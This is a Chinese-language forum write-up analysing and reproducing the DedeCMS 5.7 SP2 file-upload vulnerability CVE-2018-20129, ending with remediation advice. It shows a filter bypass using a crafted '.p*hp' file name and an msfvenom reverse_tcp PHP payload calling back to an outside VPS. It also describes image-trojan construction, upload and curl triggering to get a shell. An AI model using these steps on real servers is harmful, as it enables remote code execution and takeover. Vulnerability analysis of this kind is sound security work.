CVE-2018-20129漏洞分析及复现

渗透测试相关
#1

CVE-2018-20129漏洞分析及复现

描述

Desdev DedeCMS 5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上传漏洞,远程攻击者可利用该漏洞上传并执行任意PHP代码。

分析

uploads/include/dialog/select_images_post.php存在文件上传漏洞,这个模块对应是会员中心—>发表文章—>上传图片。

图片 1
图片 1864×485 66.7 KB

http://10.11.0.63/uploads/member/content_list.php?channelid=1
在审计select_images_post.php代码时发现36行过滤一些不正常的字符,在38行处判断了文件名是否包含了$cfg_imgtype。我们可以通过构造eee.p*hp 来进行绕过。
WX20200211-141840
WX20200211-1418401196×768 240 KB

利用

我们使用msfvenom -p php/meterpreter/reverse_tcp lhost=47.xx.xxx.xx lport=7169 -f raw >shell.php

2
2864×570 117 KB

此处,我们使用了一个vps来反弹shell。
1
1864×625 198 KB

找了个比较滑稽的图片,将shell.php和图片打成图片马。
大概操作,sss.jpg shell.php >> eee.jpg。
我们使用BurpSuitePro来进行抓包重放。
WX20200211-133358
WX20200211-1333581919×1079 673 KB

通过curl去让服务器解析。
WX20200211-140929
WX20200211-1409291919×1075 511 KB

成功返回shell。

修复建议

  • 文件后缀名检测进行重写。
  • 对上传文件名进行统一重命名,后缀名只允许为image type类型。
  • 对上传文件夹进行限制,不允许执行php。

服务器资源由ZeptoVM赞助

Partners Wiki Discord